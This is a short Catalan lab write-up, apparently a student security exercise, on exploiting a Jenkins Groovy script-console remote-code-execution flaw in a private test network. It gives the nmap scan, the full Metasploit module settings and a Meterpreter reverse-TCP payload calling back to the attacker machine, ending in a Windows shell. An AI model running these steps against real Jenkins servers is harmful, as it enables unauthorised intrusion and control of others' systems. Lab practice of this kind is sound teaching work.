# Exploit del servei Jenkins

En primer lloc he buscat vulnerabilitats relacionades amb el servei de Jenkins que pugui explotar amb Metasploit i he trobat la següent:
+ Vulnerabilitat d'execució remota de comandes (RCE) en java, fent ús de l'script Jenkins-CI Groovy.

Així doncs, anem a aprofitar-nos-en!

+ Per començar hem de comprovar que el port del servei estigui obert:
> nmap -p8484 -sV 10.0.2.4

> ![](../imatges/jenkins1.png)

+ Un cop ho hem fet, podem accedir-hi des del navegador per assegurar-nos que tot va bé:

> ![](../imatges/jenkins2.png)

+ Així doncs, ara ens cal seleccionar l'exploit que utilitzarem i configurar-lo:

> use exploit/multi/http/jenkins_script_console

> set rhost 10.0.2.4

> set targeturi /

> set rport 8484

> set srvhost 10.0.2.15

> check (per comprovar que fins ara tot vagi bé, sense executar-ho)

> set target 0

> set payload windows/meterpreter/reverse_tcp

> set lhost 10.0.2.15

![](../imatges/jenkins3.png)

+ Executem l'exploit a continuació:
> exploit

![](../imatges/jenkins4.png)

![](../imatges/jenkins5.png)

+ Com podem veure, tot ha funcionat bé i se'ns ha obert una nova sessió. Des d'aquesta podem, per exemple, consultar informació del sistema o bé obrir una shell de comandes de Windows i des d'allà consultar els usuaris,etc.

![](../imatges/jenkins6.png)


Així doncs, hem pogut obtenir accés al sistema en qüestió aprofitant l'anterior vulnerabilitat del servei de Jenkins.